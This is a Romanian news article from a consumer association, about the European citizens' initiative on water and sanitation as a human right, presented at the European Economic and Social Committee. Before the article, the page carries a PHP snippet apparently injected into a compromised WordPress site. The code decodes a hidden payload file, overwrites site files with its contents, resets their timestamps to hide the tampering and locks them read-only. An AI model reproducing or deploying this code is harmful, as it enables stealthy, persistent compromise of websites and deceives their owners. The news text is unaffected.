$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Apa, un drept fundamental al omului: povestea de succes a unei intiative cetatenesti europene – O noua atitudine

Institutiile Uniunii Europene si statele membre trebuie sa ia toate masurile necesare pentru ca toti cetatenii sa aiba acces la apa si la servicii de salubrizare; aprovizionarea cu apa si gestionarea resurselor de apa nu trebuie liberalizate si nu trebuie sa fie supuse „regulilor pietei interne”. Acesta a fost principalul mesaj al raportorului de informare privind Initiativa cetateneasca eropeana privind apa si serviciile de salubrizare, prezentat la ultima sesiune plenara a Comitetului Economic si Social European.

Initiativa cetateneasca europeana privind apa si serviciile de salubrizare este considerata drept una dintre cele mai reusite initiative de la intrarea in vigoare a ICE la 1 aprilie 2012. O initiativa cetateneasca prin care UE este invitata sa legifereze in domeniile sale competenta trebuie sprijinita de cel putin un milion de cetateni din cel putin sapte din cele 28 de state membre.

In calitate de vorbitor invitat, Carola Fischbach – Pyttel, secretar general al Federatiei Europene a Sindicatelor din Serviciile Publice (EPSU), a vorbit despre un succes rasunator: la 10 septembrie 2013, la inchiderea votului, se stransesera aproape 1,9 milioane de semnaturi de la cetateni din 13 state membre, intrunindu-se astfel aproape dublul numarului minim necesar.

Reteaua europeana pentru combaterea saraciei, unul dintre principalii sustinatori ai initiativei, a fost reprezentata la sesiunea plenara a CESE de Barbara Helfferich, care a descris succesul acestei initiative drept drept un punct crucial pentru inversarea tendintei de privatizare din Europa.

„Cu adevarat important in acest moment”, a conchis dna Fischbach – Pyttel, „este raspunsul pe care il da Comisia Europeana, sub forma unei politici concrete, la doleantele exprimate de cetatenii europeni, odata ce se va incheia procesul de validare a semnaturilor si se vor prezenta oficial rezultatele”.

Pozitia Comitetului Economic si Social (CESE) in ceea ce priveste dreptul la apa a fost exprimata in mai multe dintre avizele sale cele mai recente, in care recomanda ca aprovizionarea cu apa si gestionarea resurselor de apa sa nu fie supuse numai regulilor pietei interne si ca serviciile de aprovizionare cu apa sa nu faca obiectul liberalizarii si sa nu intre in domeniul de aplicare al Directivei privind concesiunile.

Sursa: Comitetul Economic si Social European

Asociatia Nationala pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania – A.N.P.C.P.P.S. Romania – InfoCons, unica organizatie din Romania cu drepturi depline in Consumers International, este o asociatie de consumatori neguvernamentala, reprezentativa, de drept privat, fara scop lucrativ, cu patrimoniu distinct si indivizibil, independenta, intemeiata pe principii democratice, ce apara drepturile consumatorilor.

By o9admin